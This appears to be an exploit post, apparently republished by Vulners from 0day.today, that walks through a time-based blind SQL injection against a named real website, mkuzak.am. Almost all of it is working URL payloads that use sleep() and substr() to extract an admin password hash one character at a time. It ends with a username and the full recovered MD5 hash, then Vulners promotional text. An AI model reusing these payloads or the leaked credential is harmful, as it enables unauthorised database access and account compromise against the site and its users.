http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

13-cu simvol:  c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

14-cu simvol:   a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

15-ci simvol:   c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

16-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

17-ci simvol:  0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

18--ci simvol:   0


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

19-cu simvol:   9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================

20-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

21-ci simvol:   e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

22-c simvol:   3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================


23-cu simvol:    6

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

24-cu simvol:  e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

25-ci simvol:   f


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

26-ci simvol:   0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

27-ci simvol:   0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

28-ci simvol:  7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

29-cu simvol:   2


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

30-cu simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

31-ci simvol:   3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

32-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
Qirilmadi hash:( Blya beddiydie basdan ayaga:*(

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


===========================================================

Enjoy)


/AkaStep



#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Sep 2012 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerable softwarevendorblind sql injectioncommercial licensedorkexploitedadmin panelreal exploitation exampletime basedflexapwipen'em purgensakastepazerbaijan black hatztrueloginpasswordexploitationmkuzak.amcounttable_nameinformation_schema_tablestable_schemaca
46